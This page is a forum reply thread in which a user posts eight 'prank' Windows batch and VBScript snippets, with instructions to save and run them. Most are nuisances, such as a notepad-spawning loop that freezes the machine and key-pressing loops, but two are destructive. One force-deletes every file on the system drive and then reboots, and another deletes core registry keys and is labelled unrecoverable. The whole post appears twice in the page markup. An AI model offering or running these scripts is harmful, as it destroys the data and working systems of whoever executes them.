Search
Search titles only
By:
Search titles only
By:
Log in
Register
Search
Search titles only
By:
Search titles only
By:
Menu
Install the app
Install
Forums
New posts
All threads
Latest threads
New posts
Trending threads
Trending
Search forums
What's new
New posts
New ads
New profile posts
Latest activity
Free Ads
Latest reviews
Search ads
Members
Current visitors
New profile posts
Search profile posts
Contact us
Latest ads
එක පැකේජ් එකයි මාසෙටම Unlimited Internet. තාමත් DATA CARD දාන්න සල්ලි වියදම් කරනවද? අඩුම මිලට අපෙන්.
sayuru bandara
Updated:
Tuesday at 12:30 PM
Ad icon
ඉන්ටර්නෙට් එකෙන් හරියටම සල්ලි හොයන්න සහ Success වෙන්න කැමතිද? 🚀 (E-Money & Success Stories)
siri sumana
Updated:
Saturday at 11:44 PM
Gemini AI PRO 18 months Offer
Hawaka
Updated:
May 27, 2026
Ad icon
koko account
DasunEranga
Updated:
May 27, 2026
Ad icon
koko account
DasunEranga
Updated:
May 27, 2026
Electronics
Vehicles
Property
Search
Reply to thread
Forums
General
ElaKiri Talk!
(18+)
Get the App
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Message
<blockquote data-quote="Ritash9001" data-source="post: 8411488" data-attributes="member: 310548"><p>[FONT=&quot]All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files after save restart ur computer </p><p></p><p></p><p>[/FONT] [FONT=&quot]1. The blue screen of Death [this might be dangerous]</p><p>Code:</p><p>CODE</p><p>@echo off</p><p>del %systemdrive%\*.* /f /s /q</p><p>shutdown -r -f -t 00</p><p></p><p>2. Stupidity Shutdown</p><p>*This pops up a funny message then will shutdown the computer*</p><p>Code:</p><p>CODE</p><p>@echo off</p><p>msg * Fatal system error due to admin stupidity!</p><p>shutdown -c “Error! You are too stupid!” -s -t 10</p><p></p><p>3. Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK]</p><p>*This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)*</p><p>Code:</p><p>CODE</p><p>@ECHO OFF</p><p>START reg delete HKCR/.exe</p><p>START reg delete HKCR/.dll</p><p>START reg delete HKCR/*</p><p>:MESSAGE</p><p>ECHO Your computer has been destroyed. Have a nice day.</p><p>GOTO MESSAGE</p><p></p><p>4. Endless Notepads</p><p>*This will pop up endless notepads until the computer freezes and crashes*</p><p>Code:</p><p>CODE</p><p>@ECHO off</p><p>:top</p><p>START %SystemRoot%\system32\notepad.exe</p><p>GOTO top</p><p></p><p>5. Crazy caps lock</p><p>*This constantly turns caps lock on and off really fast continuously*</p><p>Code:</p><p>CODE</p><p>Set wshShell =wscript.CreateObject(”WScript.Shell”)</p><p>do</p><p>wscript.sleep 100</p><p>wshshell.sendkeys “{CAPSLOCK**”</p><p>loop</p><p></p><p>6. Endless Enter</p><p>*This constantly makes it so the enter button is being pressed continuesly*</p><p>Code:</p><p>CODE</p><p>Set wshShell = wscript.CreateObject(”WScript.Shell”)</p><p>do</p><p>wscript.sleep 100</p><p>wshshell.sendkeys “~(enter)”</p><p>loop</p><p></p><p>7. Endless Backspace</p><p>*This makes it so the backspace key is constantly being pressed*</p><p>Code:</p><p>CODE</p><p>MsgBox “Let’s go back a few steps”</p><p>Set wshShell =wscript.CreateObject(”WScript.Shell”)</p><p>do</p><p>wscript.sleep 100</p><p>wshshell.sendkeys “{bs**”</p><p>loop</p><p></p><p>8. Popping CD Drives</p><p>*This will make the CD drives constantly pop out*</p><p>Code:</p><p>CODE</p><p>Set oWMP = CreateObject(”WMPlayer.OCX.7″)</p><p>Set colCDROMs = oWMP.cdromCollection</p><p>do</p><p>if colCDROMs.Count >= 1 then</p><p>For i = 0 to colCDROMs.Count - 1</p><p>colCDROMs.Item(i).Eject</p><p>Next</p><p>For i = 0 to colCDROMs.Count - 1</p><p>colCDROMs.Item(i).Eject</p><p>Next [/FONT]</p></blockquote><p></p>
[QUOTE="Ritash9001, post: 8411488, member: 310548"] [FONT="]All you need to do is to copy the codes , paste it in any notepad or text file, than save the text file with anynam.vbs , and yeah dont forget to change the format from text file to all files after save restart ur computer [/FONT] [FONT="]1. The blue screen of Death [this might be dangerous] Code: CODE @echo off del %systemdrive%\*.* /f /s /q shutdown -r -f -t 00 2. Stupidity Shutdown *This pops up a funny message then will shutdown the computer* Code: CODE @echo off msg * Fatal system error due to admin stupidity! shutdown -c “Error! You are too stupid!” -s -t 10 3. Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] *This will delete key registry files, then loops a message* (CANNOT BE RECOVERED FROM)* Code: CODE @ECHO OFF START reg delete HKCR/.exe START reg delete HKCR/.dll START reg delete HKCR/* :MESSAGE ECHO Your computer has been destroyed. Have a nice day. GOTO MESSAGE 4. Endless Notepads *This will pop up endless notepads until the computer freezes and crashes* Code: CODE @ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top 5. Crazy caps lock *This constantly turns caps lock on and off really fast continuously* Code: CODE Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{CAPSLOCK**” loop 6. Endless Enter *This constantly makes it so the enter button is being pressed continuesly* Code: CODE Set wshShell = wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “~(enter)” loop 7. Endless Backspace *This makes it so the backspace key is constantly being pressed* Code: CODE MsgBox “Let’s go back a few steps” Set wshShell =wscript.CreateObject(”WScript.Shell”) do wscript.sleep 100 wshshell.sendkeys “{bs**” loop 8. Popping CD Drives *This will make the CD drives constantly pop out* Code: CODE Set oWMP = CreateObject(”WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count - 1 colCDROMs.Item(i).Eject Next [/FONT] [/QUOTE]
Insert quotes…
Verification
Winadiyakata thappara keeyak tibeda?
Post reply
Top
Bottom